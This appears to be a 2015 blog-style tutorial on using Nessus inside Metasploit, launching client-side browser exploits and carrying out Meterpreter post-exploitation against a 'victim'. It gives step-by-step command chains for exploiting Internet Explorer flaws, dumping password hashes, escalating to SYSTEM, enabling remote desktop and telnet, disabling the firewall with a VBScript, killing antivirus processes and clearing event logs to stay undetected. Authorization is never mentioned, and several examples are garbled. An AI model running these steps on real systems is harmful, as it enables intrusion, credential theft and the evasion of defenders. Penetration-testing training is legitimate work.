Nessus and POST Exploitation in MetaSPLOIT

Friday, 15 May 2015

Nessus Basics 

Nessus is a properietary vulnerability scanner
It detects
> vulnerabilites
> misconfiguration
> default credentials on target system
> used in various compliance audits as well
  Learn how to use Meterpreter in Metasploit => Meterpreter Basics

Metasploit Basics => Metasploit Basisc

To open Nesses
    msfconsole -> type load nessus -> nessus_help

Connect to Nessus from our localhost for starting the scans
    nessus_connect <your username>:<your Password>@localhost:8834 <ok>
    nessus_connect prasoonnigam:hacker09@localhost:8834 ok
8834 is the default port

Check the nessus scanning policies

    nessus policy list

Four policies of Nessus
1) External network scan -> used for scanning network vulnerabilities externally
2) Internal network scan -> used for scanning network vulnerabilities internally
3) Web App Tests -> used for scaning web application for vulnerabilities
4) PCI-DSS (Payment Card Industry-data Security Standard) audits -> used in payment card industry as the data security standard

Scanning victim machine

> have to create a new scan
    nessus_scan_new <policy ID> <scan name> <target ip>
    nessus_scan_new -2 windowssan
> checking the status
> checking for the report list
    nessus report list
> opening the report
    nessus_report_hosts <report ID>
    example : nessus_report_hosts dgfwef82nd8934y89hg9rety389
>> when u see the severity, u r getting the total number of vulnerabilities

Classifications of the different vulnerabilities

> Sev 0 indicates high level vulnerabilities
> Sev 1 indicates medium level vulnerabilities
> Sev 2 indicates low-level vulnerabilities
> Sev 3 indicated informational vulnerabilities

Command to see all the vulnerabilities

    nessus_report_hosts_ports <target IP> <report id>
    example : nessus_report_hosts_ports asjfh398fdbf5t705tdb4t9

Report Importing In Metasploit

> Importing Nmap report via msfconsole in PostgreSQL database
    save any host and save the nmap report in XML format

>> Check the database connectivity with the msfconsole
    syntax : db_status

> import the Nmap report
    syntax: db_import <report path name with name>
    example: db_import /root/Desktop/scan.xml

>> see the host details
    syntax: host <ip> <hostname on which nmap scan performed>
    Example: host
you will get to know OS and Mac Address

>> check the open port and services running on those ports
    syntax: services <hostname>
    example: services

> Importing the report of nessus in msfconsole
    syntax:    db_import <report path name with file location>
    example: db_import /root/Desktop/Nessus_scan.nessus

>check the vulnerabilities
    syntax: vulns <ip (hostname)>
    example: vulns

CLient Side Exploitation

 What are Client Side Attacks ???

> The Server is the main computer that shares its resources over the network and the client which are the other computer on the network use these resources..

> There is a large arrau of attacks that may be launched against the clients
such as
> browser-based attacks
> vulnerable service exploitation
> Client OS have multiple applications such as PDF Reader, Document Reader and instant messenger

> The malicious code may exploit any form of ActiveX JAVA and Flash.. in browser

Exploits of Victim browser

> browser autopwn
    msfconsole -> use auxiliary/server/browserautopwn -> show options -> set LHOST (required field that to be filled) -> set SRVHOST (SRVHOST means localhost address (set out local machine address)) -> set SRVPORT 80 (SRVPORT means the local port address) -> run

after type in the run it starts the exploit modules on the localhost and also it provides the malicious URL which must be given and must be clicked

    -> TO check the meterpreter session that was created type in "sessions"

(getting into the computer and creating session)
-> session (shows the ID) -> session -i 1 <id> -> sysinfo

> Internet Explorer Shortcut Icon Exploit
    shortcut icons that contain a malicious DLL

    msfconsole -> use windows/browser/ms10_046_shortcut_icon_dllloader -> show options -> set SRVHOST -> set SRVPORT 80 -> set URIPATH / -> exploit -> sessions -> sessions -i 1

> Internet Explorer malicious VB script code execution exploit

    msfconsole -> use exploit/windows/browser/ms10_022_ie_vbsscript_winhlp32 -> show options -> set SRVHOST -> set SRVPORT 80 -> set URIPATH / -> exploit -> send the URL
after F1 is pressed the malicios VB script will run in the browser and send a payload names calc.exe -> sessions -> sessions -i 1

                      POST Exploitation

    Post Exploitattion basically means the phases of operation once a victim's system has been compromised by the attacker.The value of the compromised system is determined by the value of the actual data stored in it and how an attacker may make use of it for malicious purposes...
    The concept of post exploitation has risen from this fact only as to how you can use the victim's compromised system's information; documenting it, and haing an idea of the configuration channels...

Phase of post exploitation
> Understanding the victim
> Privilege escalation
> Cleaning tracks and staying undetected
> Collecting system information and data
> Setting up backdooring and rookits
> Pivoting to penetrate internal networks

Lets the first phase of post exploitation by gathering as much information

Type in :
    sysinfo (get system info)
    getpid (get process ID)
    ps (get process list)
    run checkvm (the victim's system is a virtual machine or not)
    idletime (to check whether the victim is active or not)
    run get_env (the victim's system evironment by another meterpreter script)
    ipconfig (check the victim's system IP address)
    route (to see the full network settings)
    run getcountermeasure (for mapping the security configuration of the victim's systmem)
    run getgui (enable the victim's Remote Desktop Protocol service)
    run getgui -e
    run gettelnet (enabling the telnet service)
    run gettelnet -e
    run get_local_subnets (see the local subnet of the victim's)
    run hostedit (allows an attacker to add host enteries in the windows host file)
    run hostedit -e
    run enum_logged_on_users (how many users are currently logged in)
    run enum_logged_on_users -c
    run get _application_list (it will show us all the installed applications)
    run windows/gather/forensics/enum_drives (gathering physical drive)
    run windows/gather/enum_ms_product_keys (get OS system's product key)
    run windows/gather/credentials/windows_autologin (check autologin feature)
    run winenum (dump some juicy information such as hashes and tokens)
    cd /root/.msf4/logs/scripts/winenum/Exploit-0FE265D 2013027.2532 -> LS
    cat hashdump.txt
    run scraper
    .msf4/logs/scripts/scraper/ -> cat services.txt

Post Exploitation Privilege Escalation

> Post exploitation is divided into five phases

Understanding Privilege Escalation
    Privilege Escalation in simple terms is gaining elevated privileges to resources that are normally protected and whose access is denied to normal or unauthorized users....
Example:- Things we can do after privilege escalation are installing malicious software for unethical uses
> deleting user files
> denying resources to a particular user
> viewing private information

Divided into two major forms :-
> Vertical Privilege Escalation
> Horizontal Privilege Escalation

Vertical Privilege Escalation
    a lower privileged user or application may access function that are reserved only for authorized or administrative users. This features is also known as privilege elevation..

Horizontal Privilege Escalation
    This escalation usually happens on a horizontal scale with repect t user rights. A normal user accessing the resources reserved for another person's resources

Exploiting the vicitim's system
> we use a software name called mini-share (free file sharing software)

    open msfconsole -> use ecploit/windows/http/minisgare get overflow -> show options -> set RHOST (victim ip) -> set RPORT 80 -> show targets -> set TARGET 3 (choose the options) -> exploit ->

(Meterpreter) getuid -> getsystem -h -> getsystem -t 0 -> ps

Privilege escalation by post exploitation
    Module uses the built-in getsystem command to escalate the current session to the SYSTEM account from an administrator user account.

(Meterpreter)     run post/windows/escalate/getsystem

        run post/windows/escalate/service_permissions
(Module exploits the existing administrative privileges to obtain a system session. If it Fails in the 1st instance, the module inpsects the existing service and looks for insecure file permissions that are vulnerable to an attack)

Different Exploit for compromising the target system
    msf> exploit/windows/browser/ms10 002 aurora -> show options -> set SRVHOST (Victim IP) ->  exploit -> session -> session -i 1

Post Eploitation Cleaning Up Traces
    Cleaning Tracks and trace through log deletion and staying undetected by disablig the firewall and antivirus systems

Why Firewall is important ?
A firewall is basically software or hardware that blocks unauthorized entry to a system or a network. A firewall also keeps track of intrusions and security breaches. If the firewall is well-configured, each unauthorized entry is blocked and logged in the security logs. It controls the incoming and outgoing network traffic and analyzes the data packets.
It decides whether it should allow the packet through the firewall or not.

A firewall is classified into three different types:
> Packet Filter Firewall
> Stateful Firewall
> Application Firewall

Packet Filter Firewall
    These types of firewall are associated with the first three layers of the OSI Model with a little help from the transport layer as well, for the source and destination port numbers. When a packet travels towards the packet filter firewall, it is analyzed with the help of set rules to match against.

Stateful Firewall
    These are also called second-generation firewalls. These firewalls work on the states of a network connection.Throughout the state, it determines whether to allow the packet into the network or not.

Application Firewall
    These are known as third-generation firewalls. Application firewalls work on application and protocols like HTTP, SMTP and SSH.They also help in detecting if an unwanted protocol is trying to bypass the firewall on an allowed port.

    run getcountermeasure
        operational mode         = Enable

        -> shell -> netsh firewall show opmode
see if the firewall is enable or not
        -> shell -> netsh firewall set opmode mode=disable

Disabling firewalls through VBScript

        Set objFirewall = CreateObject("HNetCfg.FwMgr")
        Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
        objPolicy.FirewallEnabled = FALSE
save code .vbs extension

syntax        upload <source filepath> <destination filepath>
Example        upload root/Desktop/disable.vbs C:\

    Goto destination and execute it

Antivirus Killing and Log Deletion

killing the processes of an antivirus with the help of post exploitation Meterpreter script known as killav

Script of killav.rb

in killav.rb the name of the antivirus must be present there then only antivirus must be stoppped..

(Meterpreter) run killav -> tasklist (to see the taskmanager process) or tasklist /svc or tasklist /svc |find/I "avg"

> TO see the property th processes that are running
        sc queryex avgwd -> sc config (process name) start= disabled (disable the process which cannot be killed)
Terminating a processes
    taskkill /F /IM "antivirus name*"

Clearing tracks to be SAFE

Clearing all the log
 (Meterpreter) clearev